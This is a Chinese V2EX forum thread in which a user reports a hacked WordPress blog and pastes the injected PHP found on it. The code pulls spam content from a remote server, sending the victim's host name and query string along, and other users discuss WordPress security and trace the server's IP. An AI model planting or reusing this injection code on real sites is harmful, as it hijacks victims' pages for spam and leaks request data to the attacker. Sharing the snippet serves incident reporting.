wordpress 被黑

2017-07-31 09:53:04 +08:00
 Wysten

自己有个网站一直没用,上面挂的是 wordpress 博客,今天上去一看被黑了。

set_time_limit(0);

header("Content-Type: text/html;charset=gb2312");
date_default_timezone_set('PRC');
$Remote_server = "http://www.028blue.com/xmbt/"; 
$host_name = "http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
$Content_mb=file_get_contents($Remote_server."/index.php?host=".$host_name."&url=".$_SERVER['QUERY_STRING']."&domain=".$_SERVER['SERVER_NAME']);

echo $Content_mb;

内容是随机的,刷新一次换一个样,不忍直视。。

2627 次点击
所在节点    程序员
5 条回复
Mutoo
2017-07-31 10:05:50 +08:00
开启自动升级,不然出漏洞没更新很容易被拿下。
msputup
2017-07-31 10:09:44 +08:00
wordpress 是最好黑的博客,没有之一。
operafans
2017-07-31 11:12:19 +08:00
@msputup #2 wp 现在安全做的还可以吧 主要是插件坑太多
ivmm
2017-07-31 11:31:51 +08:00
@msputup 不乱下盗版主题、插件,个人觉得没有比 WP 更安全的 PHP 博客了
scofieldpeng
2017-07-31 12:29:44 +08:00
看了下 028blue.com 这个,试着按着这个代码想看看,结果打不开,host 了一下,ip 是 122.10.93.116,坐标香港,cloudie.hk 的机器,然后顺便想扫描下的,结果主机貌似下线了,可惜

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/379149

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX